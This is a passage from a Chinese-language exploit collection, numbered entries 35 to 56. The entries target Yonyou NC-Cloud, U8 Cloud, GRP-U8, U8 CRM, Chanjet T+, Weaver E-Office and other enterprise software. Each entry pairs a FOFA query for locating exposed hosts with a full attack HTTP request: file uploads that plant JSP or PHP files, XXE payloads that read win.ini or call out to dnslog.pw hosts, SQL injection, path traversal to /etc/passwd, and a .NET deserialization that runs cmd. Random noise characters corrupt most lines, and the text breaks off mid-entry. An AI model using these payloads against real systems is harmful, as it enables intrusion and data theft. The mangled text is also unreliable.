7 \8 e% J3 L8 H6 v5 I0 PConnection: keep-alive& x1 @3 u" t: p) `0 z/ \
5 b7 ^( D/ X W5 B i5 z3 A% N/ y! [
35. 用友NC-Cloud importhttpscer任意文件上传
/ j& H. C# }% o3 N0 t8 b" jFOFA:app="用友-NC-Cloud"% e9 Q0 w/ v0 p5 c8 q% z" V% Y
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.18 D# k1 x9 I" a, E$ k
Host: 203.25.218.166:88883 M8 t& z2 T* U( q4 \
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
k. i' ~, C6 i2 h, FAccept-Encoding: gzip, deflate
' F8 i9 L4 o7 r, {" HAccept: */*
% k: E5 y/ W% a! |Connection: close$ @- h- m5 c6 K) T+ e
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
* b- `2 q3 @( @. cContent-Length: 190$ p* B _5 m1 p
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df04 i! Z5 e2 X. A
0 g7 S* N/ v" i- C5 D% Z: Y) C--fd28cb44e829ed1c197ec3bc71748df0 j* D% n) p+ t( z
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"
\3 X2 \# ]: F3 \" ]$ B- L Y$ U) d
1 q1 n" z6 ]# h, T7 Q/ h- V8 J<%out.println(1111*1111);%>
$ [; r$ o, L! s D4 }1 h1 O. B--fd28cb44e829ed1c197ec3bc71748df0--
3 ~9 i2 }8 t9 ^! Q$ c4 y4 u8 }8 [( T
0 P4 w { D7 x
1 F& ~- R6 `' F36. 用友NC-Cloud soapFormat XXE+ E7 y4 E @" {" r( l- ~
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
3 Y4 n. C+ ^1 m! Q$ c& K6 U. M) ?POST /uapws/soapFormat.ajax HTTP/1.1
, n& d# Z2 e* P; k0 g$ h- C- U4 s; _Host: 192.168.40.130:89891 y+ V' p7 L: R- h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
0 Z; ?3 h: ?# J U* I* vContent-Length: 263 u7 H' I3 k; K3 x$ N; K+ s8 z
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
. E+ j' y/ P# F+ M! G5 `7 \Accept-Encoding: gzip, deflate
" B% k+ b6 F: A4 P1 IAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 R5 ], @) C; Z: u- f. WConnection: close
; H- T( e( S* m# D* wContent-Type: application/x-www-form-urlencoded0 H3 t+ |' M; M% H1 _: H L( f
Upgrade-Insecure-Requests: 1& K# Z+ d" X* p7 m
, Z# {* ~) i+ s( p1 [msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a
, r8 O( e: P' c1 y7 X# I
& `' F/ l3 |- Y* c/ t, q, t
]% y: c- ~+ a8 D37. 用友NC-Cloud IUpdateService XXE
$ a' \6 K& D) w6 mFOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
) J" E6 Y' m8 R* WPOST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
6 `7 I+ [( I6 [- I0 }2 yHost: 192.168.40.130:8989
2 |. j/ r! K D( ]# aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
' U" I) E. V2 d8 M! t X) q6 }Content-Length: 4219 ]- X4 }# N7 w e2 t
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9. S, Z" g- U' {0 c+ l' g% O
Accept-Encoding: gzip, deflate
2 i$ d4 d# R: b% uAccept-Language: zh-CN,zh;q=0.9
7 l( u0 W5 p6 ^7 K- BConnection: close4 K* A9 [% D' T9 Z' J" J3 E
Content-Type: text/xml;charset=UTF-8
$ T T. ]( y# w O- O7 V" }* Y0 GSOAPAction: urn:getResult% c: z5 N3 N/ L6 R$ D% `: i9 @
Upgrade-Insecure-Requests: 1
8 U+ N% h7 o& E$ i0 k4 w
# h6 ]5 c/ j2 @4 c6 b0 X* {( t<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">4 \8 L: }& H, R/ P
<soapenv:Header/>
" N- y9 c1 e# f; m( n<soapenv:Body>
- \/ V# D& Q( D# L4 I<iup:getResult>
8 r0 R' V/ y7 V<!--type: string-->
3 W) Q, e' ~7 a<iup:string><![CDATA[
( I0 W+ L5 U/ d7 s' Q& W+ L<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
5 x& o( } _) U* z- J' b& }, c# [<xxx/>]]></iup:string>7 J# I# J8 c& G# z" G
</iup:getResult>
& `0 c6 E* W' P. ~</soapenv:Body>
# D& e- F v3 @# X) [ B</soapenv:Envelope> c+ k0 |5 U! [ Z' U
7 Q3 s+ C5 D. u! o2 x
{" q6 _0 c6 f! B7 T$ Q `
6 x1 V- O8 D: Q7 V# f$ c# k L2 N38. 用友U8 Cloud smartweb2.RPC.d XXE6 S9 _" V: l) Y7 t
FOFA:app="用友-U8-Cloud"
% V3 W/ x- Z+ F6 r* zPOST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.14 z4 Z% V( N5 W0 p1 s2 K' n
Host: 192.168.40.131:8088
. P# N, f: t' L4 w0 A: W& S" f2 F' kUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
) Y5 s* Y- |1 p; tContent-Length: 260/ k6 P) d5 R0 b. F: b& Y; A
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
/ t0 L ^0 [) g+ I) R+ BAccept-Encoding: gzip, deflate
; V7 c( J% s+ K* gAccept-Language: zh-CN,zh;q=0.9
0 R/ X$ }7 @1 ]9 ^Connection: close$ l2 ~# Q2 A4 E
Content-Type: application/x-www-form-urlencoded" v2 a6 a+ r' H/ P. }2 [2 B
" @8 s; p0 P3 L9 @
__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>
' g; L' r" L% R) f
- A# Z8 v0 Z+ Q& r
' `7 x% y o* d39. 用友U8 Cloud RegisterServlet SQL注入
' \$ {' ~; _0 C4 h0 ^. ]0 tFOFA:title="u8c"
0 I# d# p) l2 G4 Z* ?POST /servlet/RegisterServlet HTTP/1.1
; e* p: K- r# S; N+ KHost: 192.168.86.128:8089
" z3 c4 V3 X hUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36- e4 k. w7 {& u
Connection: close5 ]# q8 G9 \7 {2 k: s, w
Content-Length: 85: C$ _: @4 a8 w
Accept: */* L& V) L1 _( R
Accept-Language: en. k; k( u2 J2 t( V; H$ b/ p
Content-Type: application/x-www-form-urlencoded
8 d0 G, H ?% _ t8 lX-Forwarded-For: 127.0.0.17 L; A6 S I* I4 ~7 F
Accept-Encoding: gzip5 f7 s* o# E) \7 ~* I- U
7 H$ u7 E3 G$ p2 S, k) e0 w1 Lusercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--
$ d% i' }+ U4 } A1 D1 c
- J* ^: m' t9 T
& C! ^: B! w8 F$ C% ?0 t$ L40. 用友U8-Cloud XChangeServlet XXE
7 A6 _2 y" ~ Q9 R; g3 fFOFA:app="用友-U8-Cloud"
$ \& D, @/ {! d @2 }& R/ LPOST /service/XChangeServlet HTTP/1.1. e9 ? N! V* S+ W; p- l
Host: x.x.x.x! N. K% W0 D" ]
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
# O6 k b T, `Content-Type: text/xml
3 W' ]5 d* c& `/ N( r; M* ?Connection: close
p9 [& W( l; ~3 e
' I- r# x2 J; B+ g& D. N) }<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r> K, ]$ Z4 E, d" Y1 E* Y+ M- y) ~
% @/ o6 c* f0 l1 f
- u& K) ^( k, {' k# Y, z41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
( Z; y; c$ ~5 R+ l' I3 ^- _9 pFOFA:app="用友-U8-Cloud"
% l% b" X7 D7 W6 M5 \5 d) WGET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1* ?) t. X' ]5 y; B1 T
Host:+ }* l) |" e3 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' @1 K E& W0 e W
Content-Type: application/json0 C1 a/ R4 t$ l5 ?) C2 l+ `% Y
Accept-Encoding: gzip
8 z+ P2 a9 e( z& o4 L1 zConnection: close
* b4 W! R3 r- Z# X6 d/ M. n9 b1 m
! ], k" f6 G: Z42. 用友GRP-U8 SmartUpload01 文件上传
1 s0 s' I. g; fFOFA:app="用友-GRP-U8" y2 Y M C" ]9 e4 @2 e+ v
POST /u8qx/SmartUpload01.jsp HTTP/1.12 {: m6 o+ d2 ?* T; J- u, W
Host: x.x.x.x# n. W9 p; f5 F& |8 W. y
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt$ c% o" U0 I0 A. h% Y2 w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
+ a% F$ c( S& c' b3 |% F
) B- g1 J3 { ^+ n$ X1 p# o L$ qPAYLOAD1 V& ^9 F1 { d& [3 Q. _
% d& R% n6 P# {7 j+ b' e% Z; C
. o' |- T0 R+ o% ^! Y0 o; w, ehttp://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml& Q0 |% q; t+ ~, Y
* K6 y8 R( d: G. W; E7 m' ~
43. 用友GRP-U8 userInfoWeb SQL注入致RCE' R5 D+ d# H" E- T$ t
FOFA:app="用友-GRP-U8"/ m8 f" J8 R8 D2 |/ R/ ]& U6 m
POST /services/userInfoWeb HTTP/1.1; c+ L% \" B$ a* K
Host: your-ip0 O1 M3 g2 F2 e: \8 I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36+ F9 c( a5 c3 I9 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; f& t9 M, O7 Q4 z1 G5 I# nAccept-Encoding: gzip, deflate
7 `8 Y0 y3 U; T2 r1 WAccept-Language: zh-CN,zh;q=0.9
7 k/ e& _4 t) k% s; a- zConnection: close, k9 f' Q' J( C* W0 L3 |8 _
SOAPAction:
# V* ?' m& S" Y) X4 _- Q4 ?* gContent-Type: text/xml;charset=UTF-8' w9 o" q* k* A9 _* v
[( x8 i0 x3 |. X<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
+ f( u7 J) k+ n2 |9 t1 ~7 \% ^, t" }& B <soapenv:Header/>
( Y0 T" U* m$ w" Y <soapenv:Body>
* l( D( N$ H0 m <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> C# [5 h4 V" u$ u) J3 m
<userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
6 @$ L& P9 e- ]2 b2 w4 [2 E </ser:getUserNameById>' ^8 b# i+ k( A8 t/ E
</soapenv:Body>
; c% J/ @- ]' s* J$ r9 f- w</soapenv:Envelope>7 Y3 u5 @5 l( G& Z* v" k
5 x# L4 ?7 W% R8 a
6 q( T. D1 C% d* X2 D# w
44. 用友GRP-U8 bx_dj_check.jsp SQL注入0 n J0 k" @: N
FOFA:app="用友-GRP-U8"; ]) z0 ]# O- f) J5 G
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
" f! n% N) ~; f7 y$ T) h* ]Host: your-ip
! S/ k9 W l2 w1 w; w0 UUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36. u, f4 T+ @7 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 T6 @; q& n; O' yAccept-Encoding: gzip, deflate8 m5 [6 G# b1 G# g3 h. A' [7 ]% ^
Accept-Language: zh-CN,zh;q=0.9
+ y3 s4 O/ y. s, o: p( BConnection: close. W" N9 K* F7 r! f4 D
v9 m4 m# ^& C7 T* K4 W: I
! j! l- [5 Z, p45. 用友GRP-U8 ufgovbank XXE
, z& s, m. h2 p K7 g, N6 PFOFA:app="用友-GRP-U8"* ?% y4 m: X: a; x$ L) `( _
POST /ufgovbank HTTP/1.1
# w. p2 E0 p& e' T) X6 u3 @Host: 192.168.40.130:222
. w2 a* C0 Q- h6 A9 dUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
O4 t; F# G* o9 ?2 h8 ^Connection: close* K/ s. N6 g0 M1 B" _% x0 O2 ]; G: j
Content-Length: 161
7 i$ @; b( w; p* }1 TAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
' P. j. }% u3 _, N: Q& x XAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# e* d. h3 u" j6 g. [; V
Content-Type: application/x-www-form-urlencoded8 n# T6 Y; C( |: b9 ~& D% {+ ?
Accept-Encoding: gzip
- k7 |9 d% f9 O. Q1 T: W
% W! L; ~: {, J7 EreqData=<?xml version="1.0"?>
8 M( @/ Y$ t! P" ?' n<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest! `) h. i* {$ g) v" v6 J# a& {/ f
u* T, l% x$ w$ u6 `9 k( j
! l9 i9 N" e' W% a4 _) i46. 用友GRP-U8 sqcxIndex.jsp SQL注入7 {% z3 ?" t K, ]2 f
FOFA:app="用友-GRP-U8"
- Q, s7 U ~; A6 n9 s2 ]GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.17 M% k8 I6 l3 V; F8 i
Host: your-ip
" Q* D3 X3 B+ m! p2 Q! Q. M MUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
4 K+ S9 [ x& HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
, B: j: j+ `; R) z- yAccept-Encoding: gzip, deflate
- k8 a( i6 T0 t oAccept-Language: zh-CN,zh;q=0.9
2 G% E& E8 M$ h7 }8 G* x+ L$ RConnection: close* _* o: p/ b& T# i8 T: X
- e7 O9 D7 A3 e4 j& A- P
# N# W" h7 X1 X) c4 a47. 用友GRP A++Cloud 政府财务云 任意文件读取
/ r _2 ^$ k A" N+ UFOFA:body="/pf/portal/login/css/fonts/style.css"
% N/ m% U' D9 x( t. r" l7 E: BGET /ma/emp/maEmp/download?fileName=../../../etc/passwdHTTP/1.1
; N7 f$ f2 T& QHost: x.x.x.x0 `2 Z- K5 y4 k
Cache-Control: max-age=0
( v* ~/ X+ Y6 E, j$ O2 WUpgrade-Insecure-Requests: 1
% V* w7 L' X6 |; `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 b- J) N( ~' L; {7 k" G# Q
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.75 H8 q6 l1 s( V" u6 _6 V
Accept-Encoding: gzip, deflate, br
# C% @$ _, P. m$ ~Accept-Language: zh-CN,zh;q=0.9/ x9 O. a; A) t/ A0 M4 [4 W1 I) `
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT+ l6 Y9 L, t9 |) T3 W
Connection: close" [) M: T' @$ ?9 e
. q0 I: ^/ d% w! n
5 s1 l9 b- |$ E u- t; H
' f# W( L" r7 r/ O48. 用友U8 CRM swfupload 任意文件上传
2 C9 y2 d4 A! J7 H; D" P |! m- ?$ ~FOFA:title="用友U8CRM"
* l/ I+ F# l! e0 w( \6 A/ K. wPOST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
9 G0 ? S- b0 q/ {Host: your-ip
1 w- X- ?* I AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0- ^: q; q% O2 d T5 B6 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) N5 ^2 t4 B2 R
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 i5 }; ^" {& v3 f# EAccept-Encoding: gzip, deflate! F- c3 T3 q. ^
Content-Type: multipart/form-data;boundary=----2695209672394068716424300668554 N/ o( u/ K% C# T
------269520967239406871642430066855; h: ~* Y4 O4 Z8 {/ {( Z, S' C8 x
Content-Disposition: form-data; name="file"; filename="s.php"
! E2 c L2 a- Z8 ]3 l& F1231) t* S: [! |* x
Content-Type: application/octet-stream0 g& `! @; r3 G; e
------269520967239406871642430066855' _6 a+ g# n2 q& k- l
Content-Disposition: form-data; name="upload"1 ?0 h8 c8 V! K" {. i
upload
9 v0 o7 A+ a8 o b------269520967239406871642430066855--
# e0 i0 O$ u1 _; t
3 A; p; _# @+ e1 U
8 b$ X1 O( q/ W/ P; t, }49. 用友U8 CRM系统uploadfile.php接口任意文件上传
6 G' Q$ K2 l# O% @" d# xFOFA:body="用友U8CRM"# q2 T1 Q/ G' E6 ]$ r" Y$ \, B
' H. V* L; f. X) I: Y
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1* z# [0 X5 [- s' l8 o$ }
Host: x.x.x.x, h& n J7 R) z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
/ g8 ^) y d" ]2 BContent-Length: 329
5 e, A9 ~8 P1 H; Y w1 P2 n$ D7 yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
" k: C. V& t0 G$ l M" B6 HAccept-Encoding: gzip, deflate+ O8 O8 K/ E( q7 p! B
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 ]" Y- f0 W( l7 }3 ?Connection: close: G5 Y4 x" s J n/ z; @% H! R% v
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w8 _0 k' v# ~( i8 Z) W3 H0 }
4 n" h/ B$ A" Q$ o-----------------------------vvv3wdayqv3yppdxvn3w
+ ^ P$ c$ k% r( e% AContent-Disposition: form-data; name="file"; filename="%s.php "
5 [6 A( C0 k- N! G/ i; U0 NContent-Type: application/octet-stream
9 B" {& k, e" f, `# a- }: j6 t# ~& S! b: |- e$ z1 i7 L- ^
wersqqmlumloqa! q* I* [$ h w7 F6 C0 b9 z
-----------------------------vvv3wdayqv3yppdxvn3w
$ g5 a# S, E7 x% ~; l. X$ I+ g2 z; u9 KContent-Disposition: form-data; name="upload"
; u/ ]! ?* @6 a- d: G L5 m8 }8 D
p7 U+ L! k( I! Qupload4 C, r8 |4 s" d" d
-----------------------------vvv3wdayqv3yppdxvn3w--
+ t4 {+ F6 p* i
0 f7 D5 P3 E5 O# H1 u3 \; _* J; E* I: q8 \( Y3 D3 W! V0 L+ ]
http://x.x.x.x/tmpfile/updB3CB.tmp.php" A/ @+ E5 b u6 ]) b: n
$ m" E6 G8 c% [9 e' J/ h4 |50. QDocs Smart School 6.4.1 filterRecords SQL注入: I4 T: @- P2 U# _0 \/ W& }; Z
FOFA:body="close closebtnmodal"5 t$ U* C+ u% L! M
POST /course/filterRecords/ HTTP/1.1
8 }( e: H, u l- K( X; `Host: x.x.x.x
4 ~; U" O+ f% iUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.365 E; B5 U0 B8 A+ B, t, I
Connection: close
' m- t6 R; p+ _: ^" NContent-Length: 224& `. u2 j* X1 E. e" h- o
Accept: */*
6 ~1 x- h$ h/ R- u) MAccept-Language: en
" L- y9 h* j0 S: f. D( \5 hContent-Type: application/x-www-form-urlencoded/ j6 _; r( r$ ^! F
Accept-Encoding: gzip
% O# Z7 o+ B2 h
( B- \' p: W( B8 U4 Zsearchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1
/ n* ?" q3 v5 ~# `1 D, r/ Q ~
( k3 G: }9 P6 ?2 }1 H) z. F. E. C
8 p1 w7 t/ h2 o/ b51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入! E7 Q9 N$ M I2 Q5 g
FOFA:app="云时空社会化商业ERP系统"4 Y4 d6 e3 G j5 L8 c
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1- B5 g* h3 C8 |2 j& j+ D
Host: your-ip
8 a' x) T0 u+ G4 m) H& U9 p' {9 uUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.363 J7 ^# P3 Z! |; N
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9& g3 c0 [1 N2 i, Y
Accept-Encoding: gzip, deflate
& U7 d4 y1 e Z1 D F3 `3 ?Accept-Language: zh-CN,zh;q=0.9
, f3 K: ?2 z3 [ l# y8 tConnection: close
) }6 N( d9 d. t* j7 G
/ e' K K. g, `- l7 w5 x: |/ }% G/ o. i# m. l9 S6 o6 |& p! w
52. 泛微E-Office json_common.php sql注入
( T1 Z8 L/ `# B) EFOFA:app="泛微-EOffice"
- U; ?$ n) V, n' V# gPOST /building/json_common.php HTTP/1.1! s0 c% Z* u: I
Host: 192.168.86.128:8097
: p# d( A! d7 X- EUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" @( c0 S8 E# B- U8 ^: MConnection: close6 V) T7 h3 @8 a4 `( v
Content-Length: 87
# S- T" L# b: d8 m# z' ?' iAccept: */*
8 g. J! m4 _! L' {9 o+ oAccept-Language: en
1 l( T: M4 T5 s2 U, r3 l! T' _$ GContent-Type: application/x-www-form-urlencoded
% H& c7 j3 O6 ]8 _- M u; fAccept-Encoding: gzip
% ?* i2 i& D9 x& k \4 C& M! a' e% z
|9 s: k; y: c3 Q9 |& Stfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|3335 H. _+ |; J: Y. S+ o
# [; e4 R4 u! L. l9 Z. [% u! Q/ i# \4 o* V
53. 迪普 DPTech VPN Service 任意文件上传
; p, f+ u$ l! [# _& M+ O+ uFOFA:app="DPtech-SSLVPN"
2 H7 e) m' B0 ^/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd/ \2 \$ N( W, I/ Q% Z! x d
3 @$ @# o' K. {1 G1 @/ m5 ]$ w+ D$ [5 t, G7 g5 ?
54. 畅捷通T+ getstorewarehousebystore 远程代码执行
6 Y+ V, V% Q8 N/ Z; hFOFA:app="畅捷通-TPlus", r1 ~) I2 T$ d- F# q5 v' |! g
第一步,向目标发送数据包,执行命令,将指定字符串写入指定文件+ ^" v4 W1 J1 N4 `# o
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
% z/ O3 `6 i# \6 k- Y9 q7 A( c0 K! f4 `% `3 o. T: D: x" s5 c
# Y0 ~0 n$ x% }* p2 U8 ^
完整数据包
( w, j7 f M* y( N, ]" G PPOST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1+ A: o8 P: B5 o. n7 s6 U$ I9 Z/ r
Host: x.x.x.x5 l% } p* C- o
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F3 F2 O) }3 s/ J! d. b
Content-Length: 593
1 I. j( [- `$ t V, U* w
0 H9 {( [; p3 ]6 s{ q. x# X& a8 ]: Y: v4 w
"storeID":{/ v: z! h+ Z, B+ c$ s9 v
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
7 q* v. z; o6 q% B* W+ k V: p "MethodName":"Start",
7 }: [- H2 W( {0 \" r0 U! A! i4 S "ObjectInstance":{2 c- O9 ~, `3 H% Z" W" B
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",- o1 F! Z0 u8 d# x
"StartInfo":{
0 |& { T! d1 t5 _6 h! \! ] "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
0 `5 v7 g/ ?, g "FileName":"cmd",+ s: f% E7 ~0 [- M
"Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"1 A+ ]5 @, P8 { ]
} ]4 q9 ^. B/ B7 S8 a
}
+ X& }( Q9 W @$ x _+ N3 E }
) j, t( N* n- U* @: M5 @0 k}
6 a0 W& I* _/ _3 j$ s$ ^' A7 M& U, x+ k9 y9 L" Y
1 z! |* g/ L0 u% y第二步,访问如下url, Z, ` Y1 L, e: e+ e
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt
: y4 {% o& M# y" f3 q% u9 T0 |7 W& y. @: ~
' @$ j! s: B: U1 f( I5 v" f
55. 畅捷通T+ getdecallusers信息泄露$ r! N x; Z( I* _4 n7 \
FOFA:app="畅捷通-TPlus"
" Q; {: B1 d; i: b/ Z' z5 v9 _% H第一步,通过
( N. _0 ?/ e# K3 y/ D4 i/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword接口获取Cookie" E8 v$ y9 V3 u( Z: ]$ G6 x
第二步,利用获取到的Cookie请求
" N3 h1 L3 D2 a. r2 o' f$ ?/ p/ v/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers
5 `, g. t6 A0 E T8 v: Y( E: R3 p: N0 w) Y7 h. P4 `3 E
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE% u) i, c% T/ k4 R1 d k
FOFA: app="畅捷通-TPlus"
* d3 B% [6 B6 R% tPOST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
